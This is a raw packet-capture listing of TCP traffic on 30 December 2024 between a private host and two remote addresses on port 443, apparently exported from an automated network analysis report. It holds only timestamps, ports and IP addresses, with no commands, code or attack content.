                                                                                                              Dec 30, 2024 11:36:45.857155085 CET50015443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.857171059 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.858948946 CET50015443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.858962059 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.859785080 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.859848022 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.860150099 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.860158920 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.860302925 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:45.860308886 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.873014927 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.873069048 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.873418093 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.873429060 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:45.875309944 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:45.875334978 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.046493053 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.046575069 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.047048092 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.047054052 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.047214031 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.047219992 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.211285114 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.212162971 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.216531992 CET50015443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.216737986 CET50015443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.216757059 CET44350015142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.217526913 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.217562914 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.218282938 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.218549967 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.218564987 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.244620085 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.244676113 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.244689941 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.244801998 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.244973898 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.245007038 CET44350014142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.245049953 CET50014443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.245624065 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.245656967 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.245829105 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.246007919 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.246017933 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.294939995 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.294991970 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.295042038 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.295075893 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.295094967 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.295300961 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.295892000 CET50016443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.295912981 CET44350016142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.296370029 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.296408892 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.296463966 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.296660900 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.296675920 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.473359108 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.473434925 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.473459959 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.473490000 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.473503113 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.473530054 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.473536015 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.473567009 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.473606110 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.482737064 CET50017443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.482769966 CET44350017142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.484114885 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.484148979 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.484221935 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.484781027 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.484791040 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.817960024 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.818615913 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.818743944 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.818913937 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.821384907 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.821412086 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.822041035 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.822241068 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.822890997 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.843945026 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.844019890 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.844683886 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.844729900 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.849123955 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.849134922 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.849404097 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.849450111 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.852003098 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:46.867322922 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.899323940 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.924097061 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.924148083 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.924508095 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.924515963 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:46.924681902 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:46.924691916 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.087086916 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.087249994 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.087605953 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.087618113 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.087759018 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.087765932 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.194931030 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.195122004 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.195648909 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.195686102 CET44350022142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.195713997 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.195750952 CET50022443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.195755959 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.195827961 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.197218895 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.197243929 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.212811947 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.213713884 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.213762999 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.213762999 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.215408087 CET50023443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.215418100 CET44350023142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.215420961 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.215445995 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.215845108 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.215845108 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.215873003 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.338257074 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.338313103 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.338311911 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.338351011 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.338432074 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.338434935 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.338434935 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.339076996 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.339076996 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.339534998 CET50037443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.339582920 CET44350037142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.339688063 CET50037443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.339879990 CET50037443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.339891911 CET44350037142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.496643066 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.496690035 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.496709108 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.496735096 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.496778965 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.496805906 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.496808052 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.496910095 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.497498035 CET50026443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.497513056 CET44350026142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.497982025 CET50038443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.498006105 CET44350038142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.498214006 CET50038443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.498399019 CET50038443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.498406887 CET44350038142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.642955065 CET50024443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.642991066 CET44350024142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.800015926 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.800081968 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.800477028 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.800487041 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.802397966 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.802405119 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.839463949 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.839582920 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.840046883 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.840055943 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.840286016 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:47.840291023 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.938339949 CET44350037142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.938397884 CET50037443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.938834906 CET50037443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.938846111 CET44350037142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:47.940984964 CET50037443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:47.940989971 CET44350037142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.096769094 CET44350038142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.096827984 CET50038443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.097270012 CET50038443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.097289085 CET44350038142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.097507000 CET50038443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.097516060 CET44350038142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.174125910 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.174191952 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.175215006 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.175262928 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.175321102 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.179493904 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.179514885 CET44350031142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.179558992 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.179590940 CET50031443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.180399895 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.180430889 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.180686951 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.180686951 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.180722952 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.208780050 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.208949089 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.209233999 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.209281921 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.209395885 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.209568024 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.218054056 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.218055010 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.218086958 CET44350035142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.218146086 CET50035443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.219681978 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.219723940 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.219861984 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.220532894 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.220557928 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.252427101 CET50037443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.252470016 CET50038443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.253082037 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.253129005 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.253185987 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.253469944 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.253493071 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.254698992 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.254724026 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.254899025 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.255846977 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.255856991 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.784396887 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.784616947 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.785057068 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.785068035 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.785300970 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.785310030 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.820220947 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.820488930 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.820961952 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.820969105 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.821670055 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:48.821681976 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.851634026 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.851707935 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.852139950 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.852148056 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.852319002 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.852324963 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.874481916 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.874541998 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.874955893 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.874962091 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:48.875112057 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:48.875116110 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.157182932 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.157263994 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.157274008 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.157334089 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.157491922 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.157538891 CET44350046142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.157675028 CET50046443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.158231020 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.158261061 CET44350054142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.158531904 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.159890890 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.159902096 CET44350054142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.196537018 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.196686983 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.196706057 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.196777105 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.196819067 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.196851015 CET44350047142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.196908951 CET50047443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.197501898 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.197532892 CET44350055142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.197666883 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.197875977 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.197895050 CET44350055142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.308410883 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.308469057 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.308585882 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.308623075 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.308661938 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.308784008 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.308835030 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.308876991 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.309238911 CET50049443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.309254885 CET44350049142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.309747934 CET50056443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.309783936 CET44350056142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.309839010 CET50056443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.310241938 CET50056443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.310252905 CET44350056142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.314888000 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.314941883 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.314992905 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.315016031 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.315059900 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.315066099 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.315109015 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.315752983 CET50048443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.315762997 CET44350048142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.316678047 CET50057443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.316721916 CET44350057142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.318660975 CET50057443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.319113970 CET50057443192.168.2.4142.250.186.97
                                                                                                              Dec 30, 2024 11:36:49.319129944 CET44350057142.250.186.97192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.787137985 CET44350054142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.787208080 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.787867069 CET44350054142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.787906885 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.791589022 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.791594982 CET44350054142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.791832924 CET44350054142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.792171955 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.792617083 CET50054443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.800769091 CET44350055142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.800924063 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.801503897 CET44350055142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.801664114 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.803245068 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.803258896 CET44350055142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.803487062 CET44350055142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.803675890 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.804008007 CET50055443192.168.2.4142.250.186.142
                                                                                                              Dec 30, 2024 11:36:49.839330912 CET44350054142.250.186.142192.168.2.4
                                                                                                              Dec 30, 2024 11:36:49.851326942 CET44350055142.250.186.142192.168.2.4
